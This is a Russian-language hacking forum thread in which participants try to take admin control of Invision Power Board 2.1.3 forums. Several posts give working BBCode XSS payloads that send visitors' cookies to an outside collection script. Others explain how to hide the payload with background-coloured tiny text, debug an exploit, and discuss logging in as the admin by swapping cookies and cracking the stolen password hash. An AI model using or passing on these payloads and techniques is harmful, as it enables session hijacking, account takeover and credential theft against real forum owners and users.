Есть форум Invision Power Board v2.1.3 Проблема - достать права Админа.. =( Главная проблема в том, что ВСЕ! коды видно в Опере... Я долго думал, пробовал разные комбинацыи и нашел код, который нигде (ни в Опере, ни в ИЕ) не видно, НО, он не работает как снифер... Вот сам коД: [COLO*R=[IM*G]http://aaa.aa/=`aaa.jpg[/I*MG]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)] [/COL*OR] Кто скажет, в чем проблема ? Почему код не работает?... Заранее спасибо.
Просто сплойт почему-то не работает =( Пробовал на 8 форумах ИПБ, нигде не находил хэши... Может проблема в сплойте... я это $allchar .= chr($char); исправил, но он все-равно не работает... провил и на $allchar .= chr($i); А в КОДе выше в чем может быть проблема ? Вот сайт : http://www.ссылки в личку!.com/forum/index.php?
Кстати, может быть проблема в этом ?? Что я после src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) ---> ; не поставил ? Типа так : src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ???
Найдена XSS alert Code: [e*mail]wj@wj[u*rl=http://www.wj.com`=`][/u*rl].com[/e*mail] ` style=`background:url(javaSCrip t:alert(/wj/))` cookie Code: [em*ail]wj@wj[u*rl=http://www.wj.com`=`][/ur*l].com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Звёздочки поубирай в тэгах.
Я только что проверял, всё работает... Барсик, ты чего.... Вот только что проверял! Неее... Сплойтом не пробывал, так быстренько, на скорую руку посмотрел, XSS есть, читай статью WJ... Она поможет... Незабываем про репутацию!
Блин, в Опере всеравно коды отображаются =( А реально что-то сделать в том коде, что-бы и в Опере его небыло видно ?
У меня не работает Что не так сделал? www.barsik.jino-net.ru/forum.jpg В опере нельзя сделать, но можно код спрятать Под цвет фона
Ошибочка у тебя на скрине по мойму Попробуй так: PHP: [color=#FFF][size=-7][email]wj@wj[url=http://www.wj.com`=`][/url].com[/email]`style=`background:url(javaSCript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/size][/color]
Вот возник еще вопрос по ИПБ... Я достал ИД и Хэш админа... 1. Если я войду на форум (через смену кукисов) под аккаунтом того админа, который уже есть онлайн... что будет ? (ему что-то напишет, что под его ником зашли с другого ИП, или все будет норм и он не заметит?) 2. Нащет Хэша: Можно ли его как-то расшифровать ? Форум: Invision Power Board v2.1.3. Как я понял, там не МД5 ?
Пароль может быть в хэше Md5. Пароль может быть в хэше md5 и ещё раз в хэше md5. Пароль может быть в md5+md5соль и всё это вместе в md5. И так далее. Как узнать? Узнать как пароль зашифрован и зделать выводы. К просмотру рекомендую видео от Coyl про расшифровку паролей в IPB 2.*.* PS. Чесно говоря ожидал этого вопроса.
